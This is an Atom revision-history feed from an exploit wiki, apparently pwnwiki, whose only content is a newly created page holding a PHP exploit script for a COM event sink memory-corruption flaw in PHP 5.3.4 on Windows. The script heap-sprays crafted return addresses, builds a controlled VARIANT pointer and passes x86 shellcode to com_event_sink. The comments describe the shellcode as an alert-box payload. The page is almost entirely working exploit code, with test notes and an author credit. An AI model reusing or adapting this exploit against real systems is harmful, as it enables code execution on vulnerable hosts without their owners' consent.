https://pwnwiki.com/index.php?action=history&feed=atom&title=PHP_5.3.4_com_event_sink_0day PHP 5.3.4 com event sink 0day - Revision history 2026-04-16T22:29:42Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=PHP_5.3.4_com_event_sink_0day&diff=727&oldid=prev Pwnwiki: Created page with "==EXP== <pre> <?php //PHP 5.3.4 // //$eip ="\x44\x43\x42\x41"; $eip= "\x4b\xe8\x57\x78"; $eax ="\x80\x01\x8d\x04"; $deodrant=""; $axespray = str_repeat($eip.$eax,0x80);..." 2021-03-27T03:38:16Z <p>Created page with &quot;==EXP== &lt;pre&gt; &lt;?php //PHP 5.3.4 // //$eip =&quot;\x44\x43\x42\x41&quot;; $eip= &quot;\x4b\xe8\x57\x78&quot;; $eax =&quot;\x80\x01\x8d\x04&quot;; $deodrant=&quot;&quot;; $axespray = str_repeat($eip.$eax,0x80);...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> &lt;?php<br /> //PHP 5.3.4 <br /> <br /> //<br /> //$eip =&quot;\x44\x43\x42\x41&quot;;<br /> $eip= &quot;\x4b\xe8\x57\x78&quot;;<br /> $eax =&quot;\x80\x01\x8d\x04&quot;;<br /> $deodrant=&quot;&quot;;<br /> $axespray = str_repeat($eip.$eax,0x80);<br /> <br /> //048d0190<br /> echo strlen($axespray);<br /> echo &quot;PHP 5.3.4 WIN Com Module COM_SINK 0-day\n&quot; ;<br /> echo &quot;By Rahul Sasi : http://twitter.com/fb1h2s\n&quot; ;<br /> echo &quot;Exploit Tested on:\n Microsoft XP Pro 2002 SP2 \n&quot; ;<br /> echo &quot;More Details Here:\n http://www.garage4hackers.com/blogs/8/web-app-remote-code-execution-via-scripting-engines-part-1-local-exploits-php-0-day-394/\n&quot; ;<br /> <br /> <br /> //19200 ==4B32 4b00<br /> for($axeeffect=0;$axeeffect&lt;0x4B32;$axeeffect++)<br /> {<br /> $deodrant.=$axespray;<br /> }<br /> <br /> <br /> $terminate = &quot;T&quot;;<br /> <br /> $u[] =$deodrant;<br /> <br /> $r[] =$deodrant.$terminate;<br /> $a[] =$deodrant.$terminate;<br /> $s[] =$deodrant.$terminate;<br /> <br /> <br /> //$vVar = new VARIANT(0x048d0038+$offset); // This is what we controll<br /> $vVar = new VARIANT(0x048d0000+180); <br /> //alert box Shellcode <br /> $buffer = &quot;\x90\x90\x90&quot;.<br /> &quot;\xB9\x38\xDD\x82\x7C\x33\xC0\xBB&quot;.<br /> &quot;\xD8\x0A\x86\x7C\x51\x50\xFF\xd3&quot;;<br /> <br /> $var2 = new VARIANT(0x41414242);<br /> <br /> com_event_sink($vVar,$var2,$buffer);<br /> <br /> <br /> ?&gt;<br /> &lt;/pre&gt;</div> Pwnwiki